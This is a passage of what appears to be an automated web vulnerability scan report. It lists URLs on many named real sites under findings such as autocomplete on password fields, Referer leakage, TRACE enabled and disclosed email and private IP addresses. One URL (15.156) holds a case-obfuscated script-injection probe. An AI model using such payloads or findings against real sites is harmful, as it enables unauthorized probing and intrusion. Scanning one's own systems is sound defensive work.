15.96. http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png

15.97. http://blogs.technet.com/cfs-filesystemfile.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png

15.98. http://blogs.technet.com/photos/mmpcblog/images/3200444/original.aspx

15.99. http://blogs.technet.com/themes/TechNet/Images/MediaGalleries/icon-share.gif

15.100. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-home.gif

15.101. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-info.gif

15.102. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-rss.gif

15.103. http://blogs.technet.com/themes/TechNet/css/DynamicStyle.aspx

15.104. http://blogs.technet.com/themes/TechNet/css/base.css

15.105. http://blogs.technet.com/themes/TechNet/css/content-fragments-core.css

15.106. http://blogs.technet.com/themes/TechNet/css/content-fragments-forums.css

15.107. http://blogs.technet.com/themes/TechNet/css/content-fragments-groups.css

15.108. http://blogs.technet.com/themes/TechNet/css/content-fragments-mediagalleries.css

15.109. http://blogs.technet.com/themes/TechNet/css/content-fragments-messages.css

15.110. http://blogs.technet.com/themes/TechNet/css/content-fragments-weblogs.css

15.111. http://blogs.technet.com/themes/TechNet/css/content-fragments-wikis.css

15.112. http://blogs.technet.com/themes/TechNet/css/content-fragments.css

15.113. http://blogs.technet.com/themes/TechNet/css/footer-fragments.css

15.114. http://blogs.technet.com/themes/TechNet/css/header-fragments.css

15.115. http://blogs.technet.com/themes/TechNet/css/print.css

15.116. http://blogs.technet.com/themes/TechNet/css/screen.css

15.117. http://blogs.technet.com/themes/TechNet/favicon.ico

15.118. http://blogs.technet.com/themes/blogs/TechNet/css/DynamicStyle.aspx

15.119. http://blogs.technet.com/themes/blogs/TechNet/css/technetblogs.css

15.120. http://blogs.technet.com/themes/blogs/TechNet/images/group-nav-sep.png

15.121. http://blogs.technet.com/themes/generic/css/layout.css

15.122. http://blogs.technet.com/themes/groups/TechNet/css/DynamicStyle.aspx

15.123. http://blogs.technet.com/themes/technet/css/technet.css

15.124. http://blogs.technet.com/themes/technet/images/technet/layout-background.png

15.125. http://blogs.technet.com/themes/technet/images/technet/layout-footer.png

15.126. http://blogs.technet.com/themes/technet/images/technet/microsoft.gif

15.127. http://blogs.technet.com/themes/technet/images/technet/search.png

15.128. http://blogs.technet.com/themes/technet/images/technet/technet-body.png

15.129. http://blogs.technet.com/themes/technet/images/technet/widget-left.png

15.130. http://blogs.technet.com/themes/technet/images/technet/widget-right.png

15.131. http://blogs.technet.com/utility/jquery/autoresize.jquery.min.js

15.132. http://blogs.technet.com/utility/jquery/jquery-1.3.2.min.js

15.133. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

15.134. http://c.bing.com/c.gif

15.135. http://c.microsoft.com/trans_pixel.asp

15.136. http://d.101m3.com/afr.php

15.137. http://d.101m3.com/lg.php

15.138. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255

15.139. http://explore.live.com/Handlers/Plt.mvc

15.140. https://feedback.discoverbing.com/default.aspx

15.141. http://forums.smartertools.com/

15.142. http://forums.smartertools.com/12.aspx

15.143. http://forums.smartertools.com/AddPost.aspx

15.144. http://forums.smartertools.com/cssearch/SearchResults.aspx

15.145. http://forums.smartertools.com/login.aspx

15.146. http://forums.smartertools.com/members/Chromebuster.aspx

15.147. http://forums.smartertools.com/t/33244.aspx

15.148. http://forums.smartertools.com/t/33246.aspx

15.149. http://forums.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx

15.150. http://leadback.advertising.com/adcedge/lb

15.151. http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif

15.152. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

15.153. http://office.microsoft.com/en-us/sharepoint-workspace/

15.154. http://order.1and1.com/xml/order

15.155. http://order.1and1.com/xml/order

15.156. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

15.157. http://order.1and1.com/xml/order/DomaininfoMove

15.158. http://order.1and1.com/xml/order/Eshops

15.159. http://order.1and1.com/xml/order/Home

15.160. http://order.1and1.com/xml/order/Home

15.161. http://order.1and1.com/xml/order/Hosting

15.162. http://order.1and1.com/xml/order/Instant

15.163. http://order.1and1.com/xml/order/LocalSubmission

15.164. http://order.1and1.com/xml/order/Mail

15.165. http://order.1and1.com/xml/order/MailInstantMail

15.166. http://order.1and1.com/xml/order/MailXchange

15.167. http://order.1and1.com/xml/order/MicrosoftExchange

15.168. http://order.1and1.com/xml/order/MsHosting

15.169. http://order.1and1.com/xml/order/Server

15.170. http://order.1and1.com/xml/order/ServerPremium

15.171. http://order.1and1.com/xml/order/VirtualServer

15.172. http://order.1and1.com/xml/order/sitedesign

15.173. http://pixel.mathtag.com/creative/img

15.174. http://pixel.quantserve.com/pixel

15.175. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

15.176. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif

15.177. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js

15.178. http://safebrowsing.clients.google.com/safebrowsing/downloads

15.179. http://safebrowsing.clients.google.com/safebrowsing/gethash

15.180. http://sales.liveperson.net/hc/18987408/

15.181. http://tacoda.at.atwola.com/rtx/r.js

15.182. http://tags.bluekai.com/site/3200

15.183. http://technet.microsoft.com/security/ff852094.aspx

15.184. http://tracker.marinsm.com/tp

15.185. http://www.fast-report.com/bitrix/redirect.php

15.186. http://www.fast-report.com/bitrix/redirect2.php

15.187. http://www.fast-report.com/en/buy/

15.188. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

15.189. http://www.fast-report.com/en/download/fastreport.net-download.html

15.190. http://www.fast-report.com/en/download/fastreport.net-download.html/

15.191. http://www.fast-report.com/en/products/

15.192. http://www.fast-report.com/en/products/FastReport.Net.html

15.193. http://www.fast-report.com/favicon.ico

15.194. https://www.godaddy.com/

15.195. https://www.godaddy.com/Hosting/web-hosting.aspx

15.196. https://www.godaddy.com/catalog.aspx

15.197. https://www.godaddy.com/domains/search.aspx

15.198. https://www.godaddy.com/gdshop/hosting/landing.asp

15.199. https://www.godaddy.com/hosting/website-builder.aspx

15.200. http://www.soundingsonline.com/archives/'+NSFTW+'

16. Password field with autocomplete enabled

16.1. http://forums.smartertools.com/login.aspx

16.2. http://forums.smartertools.com/login.aspx

16.3. http://www.fast-report.com/en/buy/

16.4. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

16.5. http://www.fast-report.com/en/download/fastreport.net-download.html

16.6. http://www.fast-report.com/en/download/fastreport.net-download.html/

16.7. http://www.fast-report.com/en/products/

16.8. http://www.fast-report.com/en/products/FastReport.Net.html

16.9. https://www.godaddy.com/

16.10. https://www.godaddy.com/

16.11. https://www.godaddy.com/Hosting/web-hosting.aspx

16.12. https://www.godaddy.com/catalog.aspx

16.13. https://www.godaddy.com/domains/search.aspx

16.14. https://www.godaddy.com/domains/search.aspx

16.15. https://www.godaddy.com/gdshop/hosting/landing.asp

16.16. https://www.godaddy.com/gdshop/hosting/landing.asp

16.17. https://www.godaddy.com/hosting/website-builder.aspx

16.18. http://www.my-happyfeet.com/cart.asp

16.19. https://www.territoryahead.com/account/login/loginmain.jsp

17. Source code disclosure

18. Referer-dependent response

18.1. http://c.microsoft.com/trans_pixel.asp

18.2. http://fast.fonts.com/d/ccdadc2e-26c9-48a5-9c52-9c3cc58e9930.ttf

18.3. https://feedback.discoverbing.com/default.aspx

18.4. http://fonts.citysbest.com/k/uni0vle-e.css

18.5. http://technet.microsoft.com/en-us/magazine/ff426023.aspx

18.6. http://technet.microsoft.com/en-us/magazine/gg703766.aspx

18.7. http://use.typekit.com/k/lvr1wgh-b.css

18.8. http://www.facebook.com/plugins/like.php

18.9. http://www.fast-report.com/en/buy/

18.10. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

18.11. http://www.fast-report.com/en/download/fastreport.net-download.html/

18.12. http://www.fast-report.com/en/products/

18.13. http://www.microsoft.com/library/gallery/components/ratingControl/ratings.aspx

18.14. http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx

19. Cross-domain POST

19.1. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

19.2. http://my-happyfeet.com/proddetail.asp

20. Cross-domain Referer leakage

20.1. http://a.rad.msn.com/ADSAdClient31.dll

20.2. http://a.rad.msn.com/ADSAdClient31.dll

20.3. http://a.rad.msn.com/ADSAdClient31.dll

20.4. http://a12.alphagodaddy.com/

20.5. http://a12.alphagodaddy.com/

20.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

20.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

20.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

20.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

20.10. http://ad.doubleclick.net/adi/huffpost.politics/news

20.11. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43

20.12. http://ad.doubleclick.net/adj/huffpost.politics/news

20.13. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain

20.14. http://ads.tw.adsonar.com/adserving/getAds.jsp

20.15. http://advertising.microsoft.com/search-advertising

20.16. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/noperf=1

20.17. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

20.18. http://bidder.mathtag.com/iframe/notify

20.19. http://bidder.mathtag.com/iframe/notify

20.20. http://d.101m3.com/afr.php

20.21. http://d.101m3.com/afr.php

20.22. http://d.101m3.com/afr.php

20.23. http://d.101m3.com/afr.php

20.24. http://d.101m3.com/afr.php

20.25. http://d.101m3.com/afr.php

20.26. http://d.101m3.com/afr.php

20.27. http://d.101m3.com/afr.php

20.28. http://d.101m3.com/afr.php

20.29. http://d.101m3.com/afr.php

20.30. http://d.101m3.com/afr.php

20.31. http://d.101m3.com/afr.php

20.32. http://d.101m3.com/afr.php

20.33. http://d.101m3.com/afr.php

20.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

20.35. https://feedback.discoverbing.com/default.aspx

20.36. http://forums.smartertools.com/cssearch/SearchResults.aspx

20.37. http://forums.smartertools.com/login.aspx

20.38. http://gfc.com/bios.php

20.39. http://gfc.com/human-resource-services.php

20.40. http://googleads.g.doubleclick.net/pagead/ads

20.41. http://googleads.g.doubleclick.net/pagead/ads

20.42. http://googleads.g.doubleclick.net/pagead/ads

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://googleads.g.doubleclick.net/pagead/ads

20.46. http://googleads.g.doubleclick.net/pagead/ads

20.47. http://googleads.g.doubleclick.net/pagead/ads

20.48. http://googleads.g.doubleclick.net/pagead/ads

20.49. http://googleads.g.doubleclick.net/pagead/ads

20.50. http://googleads.g.doubleclick.net/pagead/ads

20.51. http://googleads.g.doubleclick.net/pagead/ads

20.52. http://googleads.g.doubleclick.net/pagead/ads

20.53. http://googleads.g.doubleclick.net/pagead/ads

20.54. http://googleads.g.doubleclick.net/pagead/ads

20.55. http://googleads.g.doubleclick.net/pagead/ads

20.56. http://googleads.g.doubleclick.net/pagead/ads

20.57. http://googleads.g.doubleclick.net/pagead/ads

20.58. http://googleads.g.doubleclick.net/pagead/ads

20.59. http://googleads.g.doubleclick.net/pagead/ads

20.60. http://googleads.g.doubleclick.net/pagead/ads

20.61. http://googleads.g.doubleclick.net/pagead/ads

20.62. http://googleads.g.doubleclick.net/pagead/ads

20.63. http://googleads.g.doubleclick.net/pagead/ads

20.64. http://googleads.g.doubleclick.net/pagead/ads

20.65. http://googleads.g.doubleclick.net/pagead/ads

20.66. http://googleads.g.doubleclick.net/pagead/ads

20.67. http://googleads.g.doubleclick.net/pagead/ads

20.68. http://googleads.g.doubleclick.net/pagead/ads

20.69. http://googleads.g.doubleclick.net/pagead/ads

20.70. http://learn.shavlik.com/shavlik/index.cfm

20.71. http://my-happyfeet.com/cart.asp

20.72. http://my-happyfeet.com/proddetail.asp

20.73. http://o.aolcdn.com/art/merge

20.74. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

20.75. http://order.1and1.com/xml/order/Home

20.76. http://rad.msn.com/ADSAdClient31.dll

20.77. http://rad.msn.com/ADSAdClient31.dll

20.78. http://rad.msn.com/ADSAdClient31.dll

20.79. http://s.huffpost.com/assets/js.php

20.80. https://secure.avangate.com/order/cart.php

20.81. https://secure.avangate.com/order/checkout.php

20.82. https://secure.shareit.com/shareit/checkout.html

20.83. http://www.aol.com/ajax.jsp

20.84. http://www.aol.com/ajax.jsp

20.85. http://www.aol.com/ajax.jsp

20.86. http://www.aol.com/ajax.jsp

20.87. http://www.aol.com/ajax.jsp

20.88. http://www.aol.com/ajax.jsp

20.89. http://www.aol.com/ajax.jsp

20.90. http://www.aol.com/ajax.jsp

20.91. http://www.aol.com/ajax.jsp

20.92. http://www.aol.com/ajax.jsp

20.93. http://www.aol.com/ajax.jsp

20.94. http://www.aol.com/ajax.jsp

20.95. http://www.aol.com/ajax.jsp

20.96. http://www.aol.com/ajax.jsp

20.97. http://www.aol.com/ajax.jsp

20.98. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

20.99. http://www.facebook.com/plugins/like.php

20.100. http://www.fast-report.com/en/download/fastreport.net-download.html/

20.101. https://www.godaddy.com/

20.102. https://www.godaddy.com/Hosting/web-hosting.aspx

20.103. https://www.godaddy.com/catalog.aspx

20.104. https://www.godaddy.com/domains/search.aspx

20.105. https://www.godaddy.com/gdshop/hosting/landing.asp

20.106. https://www.godaddy.com/hosting/website-builder.aspx

20.107. http://www.huffingtonpost.com/permalink-tracker.html

20.108. http://www.huffingtonpost.com/threeup.php

20.109. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

20.110. http://www.microsoft.com/security/msrc/RssFeedGenerator.aspx

20.111. http://www.microsoft.com/security/msrc/Twitter_msrc_Feeds_New.aspx

20.112. http://www.my-happyfeet.com/cart.asp

20.113. http://www.nutter.com/careers.php

20.114. https://www.plimus.com/jsp/buynow_analytics.jsp

20.115. http://www.soundingsonline.com/archives/'+NSFTW+'

20.116. https://www.supermedia.com/spportal/spportalFlow.do

20.117. https://www.territoryahead.com/jump.jsp

21. Cross-domain script include

21.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

21.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

21.3. http://ad.doubleclick.net/adi/huffpost.politics/news

21.4. http://advertising.microsoft.com/search-advertising

21.5. http://bidder.mathtag.com/iframe/notify

21.6. http://bidder.mathtag.com/iframe/notify

21.7. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

21.8. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

21.9. http://cloudscan.org/

21.10. https://feedback.discoverbing.com/default.aspx

21.11. http://googleads.g.doubleclick.net/pagead/ads

21.12. http://googleads.g.doubleclick.net/pagead/ads

21.13. http://googleads.g.doubleclick.net/pagead/ads

21.14. http://learn.shavlik.com/shavlik/mail-list-patch-management-org.aspx

21.15. http://learn.shavlik.com/shavlik/mail-list-remediator.aspx

21.16. http://learn.shavlik.com/shavlik/mail-list-shavlik-announce.aspx

21.17. http://learn.shavlik.com/shavlik/mail-list-shavlik-xml.aspx

21.18. http://office.microsoft.com/en-us/sharepoint-workspace/

21.19. https://secure.avangate.com/order/cart.php

21.20. https://secure.avangate.com/order/checkout.php

21.21. https://secure.shareit.com/shareit/checkout.html

21.22. http://technet.microsoft.com/en-us/

21.23. http://technet.microsoft.com/en-us/security/cc261624

21.24. http://technet.microsoft.com/en-us/security/cc308575

21.25. http://technet.microsoft.com/en-us/security/cc308589

21.26. http://technet.microsoft.com/en-us/security/default

21.27. http://technet.microsoft.com/en-us/security/ff852094.aspx

21.28. http://www.aim.com/products/express/

21.29. http://www.aol.com/

21.30. http://www.cloudscan.me/

21.31. http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html

21.32. http://www.cramerdev.com/

21.33. http://www.cramerdev.com/get-in-touch

21.34. http://www.cramerdev.com/get-in-touch/

21.35. http://www.cramerdev.com/weblog/

21.36. http://www.facebook.com/plugins/like.php

21.37. https://www.godaddy.com/

21.38. https://www.godaddy.com/Hosting/web-hosting.aspx

21.39. https://www.godaddy.com/catalog.aspx

21.40. https://www.godaddy.com/domains/search.aspx

21.41. https://www.godaddy.com/gdshop/hosting/landing.asp

21.42. https://www.godaddy.com/hosting/website-builder.aspx

21.43. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html

21.44. http://www.huffingtonpost.com/permalink-tracker.html

21.45. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

21.46. http://www.microsoft.com/global/security/microsites/msrc/PublishingImages/spacer.gif

21.47. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js

21.48. http://www.smartertools.com/

21.49. http://www.smartertools.com/smartermail/mail-server-download.aspx

21.50. http://www.smartertools.com/smartermail/mail-server-software.aspx

21.51. http://www.soundingsonline.com/archives/'+NSFTW+'

21.52. https://www.supermedia.com/help

21.53. https://www.supermedia.com/help/direct-mail

21.54. https://www.supermedia.com/help/domains-email

21.55. https://www.supermedia.com/help/local-search-marketing

21.56. https://www.supermedia.com/help/web-site-design

21.57. https://www.territoryahead.com/text/cm/eluminate.js

21.58. https://www.territoryahead.com/text/js/displayfunctions.js

21.59. http://www.vcahospitals.com/favicon.ico

22. TRACE method is enabled

22.1. http://ads.pubmatic.com/

22.2. http://b.aol.com/

22.3. http://dominionenterprises.112.2o7.net/

22.4. http://entry-stats.huffpost.com/

22.5. http://image3.pubmatic.com/

22.6. http://music.aol.com/

22.7. http://o.sa.aol.com/

22.8. http://pixel.1und1.de/

22.9. http://ptrack.pubmatic.com/

22.10. http://secure-us.imrworldwide.com/

22.11. http://tacoda.at.atwola.com/

22.12. http://texasgroup.net/

22.13. http://www.aamrafitness.com/

22.14. http://www.aamranetworks.com/

22.15. http://www.aamraoutsourcing.com/

22.16. http://www.aamraresources.com/

22.17. http://www.aim.com/

22.18. http://www.bluestarfibres.com/

22.19. http://www.citysbest.com/

22.20. http://www.nutter.com/

22.21. http://www.vcahospitals.com/

23. Email addresses disclosed

23.1. http://advertising.microsoft.com/search-advertising

23.2. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

23.3. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

23.4. http://forums.smartertools.com/t/33246.aspx

23.5. http://gfc.com/business-consulting.php

23.6. http://gfc.com/information-technology.php

23.7. http://i2.technet.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

23.8. http://i2.technet.microsoft.com/platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js

23.9. http://learn.shavlik.com/shavlik/

23.10. http://learn.shavlik.com/shavlik/download.cfm

23.11. http://learn.shavlik.com/shavlik/index.cfm

23.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx

23.13. http://microsoftcambridge.com/People/tabid/56/Default.aspx

23.14. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.15. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js

23.16. http://microsoftcambridge.com/Teams/ApplicationVirtualization/tabid/83/Default.aspx

23.17. http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx

23.18. http://microsoftcambridge.com/Teams/ISC/tabid/341/Default.aspx

23.19. http://microsoftcambridge.com/Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx

23.20. http://microsoftcambridge.com/Teams/MicrosoftOnlineServices/tabid/175/Default.aspx

23.21. http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx

23.22. http://microsoftcambridge.com/Teams/SharePointWorkspace/tabid/455/Default.aspx

23.23. http://microsoftcambridge.com/Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx

23.24. http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx

23.25. http://microsoftcambridge.com/Teams/tabid/55/Default.aspx

23.26. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js

23.27. http://my-happyfeet.com/cart.asp

23.28. http://my-happyfeet.com/proddetail.asp

23.29. http://office.microsoft.com/en-us/sharepoint-workspace/

23.30. http://s.huffpost.com/assets/js.php

23.31. http://technet.microsoft.com/en-us/magazine/gg670984.aspx

23.32. http://technet.microsoft.com/en-us/security/cc261624

23.33. http://technet.microsoft.com/en-us/security/ff852094.aspx

23.34. http://texasgroup.net/contact.html

23.35. http://texasgroup.net/management.html

23.36. http://texasgroup.net/teml_pro.html

23.37. http://www.aamraresources.com/

23.38. http://www.cramerdev.com/get-in-touch

23.39. http://www.cramerdev.com/get-in-touch/

23.40. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

23.41. https://www.godaddy.com/

23.42. https://www.godaddy.com/Hosting/web-hosting.aspx

23.43. https://www.godaddy.com/catalog.aspx

23.44. https://www.godaddy.com/domains/search.aspx

23.45. https://www.godaddy.com/gdshop/hosting/landing.asp

23.46. https://www.godaddy.com/hosting/website-builder.aspx

23.47. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html

23.48. http://www.manitu.de/

23.49. http://www.manitu.de/dsl/

23.50. http://www.manitu.de/root-server/

23.51. http://www.manitu.de/shop/

23.52. http://www.manitu.de/webhosting/

23.53. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery.colorbox-min.js

23.54. http://www.microsoft.com/global/security/msrc/renderingassets/scripts/CommonFunctions.js

23.55. http://www.microsoft.com/security/msrc/default.aspx

23.56. http://www.microsoft.com/technet/code/omniture/omni_rsid_mscomtechnet.js

23.57. http://www.my-happyfeet.com/cart.asp

23.58. http://www.nutter.com/careers.php

23.59. https://www.plimus.com/jsp/buynow.jsp

23.60. http://www.smartertools.com/

23.61. http://www.smartertools.com/smartermail/mail-server-download.aspx

23.62. http://www.soundingsonline.com/archives/'+NSFTW+'

23.63. http://www.soundingsonline.com/s_code.js

23.64. https://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js

23.65. https://www2.hbc.com/contactus/contact-us.asp

24. Private IP addresses disclosed

24.1. http://connect.facebook.net/en_US/all.js

24.2. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg

24.3. http://microsoftcambridge.com/Portals/0/events/AgileGames2011_thum.png

24.4. http://microsoftcambridge.com/Portals/0/events/CleantechNortheast_thum.png

24.5. http://microsoftcambridge.com/Portals/0/events/FUserGroup_thum.png

24.6. http://microsoftcambridge.com/Portals/0/events/HPC&GPU_thum.png

24.7. http://microsoftcambridge.com/Portals/0/events/LevelUpYourUserExperience_thum.png

24.8. http://microsoftcambridge.com/Portals/0/events/NERD-MITX_img.png

24.9. http://microsoftcambridge.com/Portals/0/events/NERD-MITX_thum.png

24.10. http://microsoftcambridge.com/Portals/0/events/NERDwomensHistory_img.png

24.11. http://microsoftcambridge.com/Portals/0/events/NERDwomensHistory_thum.png

24.12. http://microsoftcambridge.com/Portals/0/events/NESAE_thum.png

24.13. http://microsoftcambridge.com/Portals/0/events/ProductCampBoston_thum.png

24.14. http://microsoftcambridge.com/Portals/0/events/aca_thum.png

24.15. http://microsoftcambridge.com/Portals/0/events/arduino_thum.png

24.16. http://microsoftcambridge.com/Portals/0/events/barcamp_thum.png

24.17. http://microsoftcambridge.com/Portals/0/events/bazure_thum.png

24.18. http://microsoftcambridge.com/Portals/0/events/blogbrown_thum.png

24.19. http://microsoftcambridge.com/Portals/0/events/boomwriter_thum.png

24.20. http://microsoftcambridge.com/Portals/0/events/boston-area-sharepoint_thum.png

24.21. http://microsoftcambridge.com/Portals/0/events/bostonWordpressMeetup_thum.png

24.22. http://microsoftcambridge.com/Portals/0/events/bostonphp_thum.png

24.23. http://microsoftcambridge.com/Portals/0/events/bug_thum.png

24.24. http://microsoftcambridge.com/Portals/0/events/byhp_thum.png

24.25. http://microsoftcambridge.com/Portals/0/events/dotnetnuke_thum.png

24.26. http://microsoftcambridge.com/Portals/0/events/easterSealsMA_thum.png

24.27. http://microsoftcambridge.com/Portals/0/events/eventarchive.png

24.28. http://microsoftcambridge.com/Portals/0/events/events_title.png

24.29. http://microsoftcambridge.com/Portals/0/events/fluidicmems_thum.png

24.30. http://microsoftcambridge.com/Portals/0/events/kogent_thum.png

24.31. http://microsoftcambridge.com/Portals/0/events/masschallenge_thum.png

24.32. http://microsoftcambridge.com/Portals/0/events/michiganross_thum.png

24.33. http://microsoftcambridge.com/Portals/0/events/owasp_boston_application_thum.png

24.34. http://microsoftcambridge.com/Portals/0/events/pythonmeetup_thum.png

24.35. http://microsoftcambridge.com/Portals/0/events/refreshBoston_thum.png

24.36. http://microsoftcambridge.com/Portals/0/events/register_now.jpg

24.37. http://microsoftcambridge.com/Portals/0/events/rootcauseshowcase_thum.png

24.38. http://microsoftcambridge.com/Portals/0/events/scala_thum.png

24.39. http://microsoftcambridge.com/Portals/0/events/tick.png

24.40. http://microsoftcambridge.com/Portals/0/events/upcomingevents.png

24.41. http://microsoftcambridge.com/Portals/0/events/viewarch.png

24.42. http://microsoftcambridge.com/Portals/0/events/viewupc.png

24.43. http://microsoftcambridge.com/Portals/0/events/webspark_thum.png

24.44. http://microsoftcambridge.com/Portals/0/events/wid_thum.png

24.45. http://microsoftcambridge.com/Portals/0/home/EdwinGuarinSm.jpg

24.46. http://microsoftcambridge.com/Portals/0/home/chronicle-vid.jpg

24.47. http://microsoftcambridge.com/Portals/0/home/inthenews.png

24.48. http://microsoftcambridge.com/Portals/0/home/studentstab.png

24.49. http://microsoftcambridge.com/Portals/0/home/upcomingevents.png

24.50. http://microsoftcambridge.com/Portals/0/home/welcome.png

24.51. http://microsoftcambridge.com/Portals/0/people/PaulCoebergh_thumb.jpg

24.52. http://microsoftcambridge.com/Portals/0/people/SaraSpalding_thumb.jpg

24.53. http://microsoftcambridge.com/Portals/0/people/YaelKalai_thumb.jpg

24.54. http://microsoftcambridge.com/Portals/0/people/Yaelfeat.jpg

24.55. http://microsoftcambridge.com/Portals/0/people/YunGuo_thumb.jpg

24.56. http://microsoftcambridge.com/Portals/0/people/Yunfeat.jpg

24.57. http://microsoftcambridge.com/Portals/0/people/dbrent_thumb.jpg

24.58. http://microsoftcambridge.com/Portals/0/people/jhowe_thumb.jpg

24.59. http://microsoftcambridge.com/Portals/0/people/lbrunson_thumb.jpg

24.60. http://microsoftcambridge.com/Portals/0/people/people_right.png

24.61. http://microsoftcambridge.com/Portals/0/people/people_title.png

24.62. http://microsoftcambridge.com/Portals/0/people/peopleh2_tsingh.png

24.63. http://microsoftcambridge.com/Portals/0/people/tick.png

24.64. http://microsoftcambridge.com/Portals/0/people/tsingh.jpg

24.65. http://microsoftcambridge.com/Portals/0/people/tsingh_thumb.jpg

24.66. http://microsoftcambridge.com/Portals/0/rss.png

24.67. http://microsoftcambridge.com/Portals/0/share_icons.png

24.68. http://microsoftcambridge.com/Portals/0/teams/ISC-header.jpg

24.69. http://microsoftcambridge.com/Portals/0/teams/MNIOL-header.jpg

24.70. http://microsoftcambridge.com/Portals/0/teams/app_v_header.jpg

24.71. http://microsoftcambridge.com/Portals/0/teams/app_v_inline.jpg

24.72. http://microsoftcambridge.com/Portals/0/teams/app_virt.png

24.73. http://microsoftcambridge.com/Portals/0/teams/csa_conc.png

24.74. http://microsoftcambridge.com/Portals/0/teams/csa_header.jpg

24.75. http://microsoftcambridge.com/Portals/0/teams/csa_inline.jpg

24.76. http://microsoftcambridge.com/Portals/0/teams/csacd.png

24.77. http://microsoftcambridge.com/Portals/0/teams/feature_dbrent.jpg

24.78. http://microsoftcambridge.com/Portals/0/teams/feature_jhowe.jpg

24.79. http://microsoftcambridge.com/Portals/0/teams/feature_tsingh.jpg

24.80. http://microsoftcambridge.com/Portals/0/teams/fuse.png

24.81. http://microsoftcambridge.com/Portals/0/teams/fuseimg.jpg

24.82. http://microsoftcambridge.com/Portals/0/teams/iscteam.png

24.83. http://microsoftcambridge.com/Portals/0/teams/mav.png

24.84. http://microsoftcambridge.com/Portals/0/teams/mrne.png

24.85. http://microsoftcambridge.com/Portals/0/teams/msft_advert.png

24.86. http://microsoftcambridge.com/Portals/0/teams/msft_research.png

24.87. http://microsoftcambridge.com/Portals/0/teams/msftonlineserv-header.jpg

24.88. http://microsoftcambridge.com/Portals/0/teams/msfuselabs.png

24.89. http://microsoftcambridge.com/Portals/0/teams/mtechcomp.png

24.90. http://microsoftcambridge.com/Portals/0/teams/officecom.png

24.91. http://microsoftcambridge.com/Portals/0/teams/our_teams.png

24.92. http://microsoftcambridge.com/Portals/0/teams/research_header.jpg

24.93. http://microsoftcambridge.com/Portals/0/teams/research_inline.jpg

24.94. http://microsoftcambridge.com/Portals/0/teams/sharepoint.png

24.95. http://microsoftcambridge.com/Portals/0/teams/sharepoint_img.png

24.96. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

24.97. http://microsoftcambridge.com/Portals/0/teams/sharepoint_workspace_title.png

24.98. http://microsoftcambridge.com/Portals/0/teams/sspalding_feat.jpg

24.99. http://microsoftcambridge.com/Portals/0/teams/startuplabs_inline.jpg

24.100. http://microsoftcambridge.com/Portals/0/teams/teamlogo_MNOIL.png

24.101. http://microsoftcambridge.com/Portals/0/teams/teamlogo_msftonlineserv.png

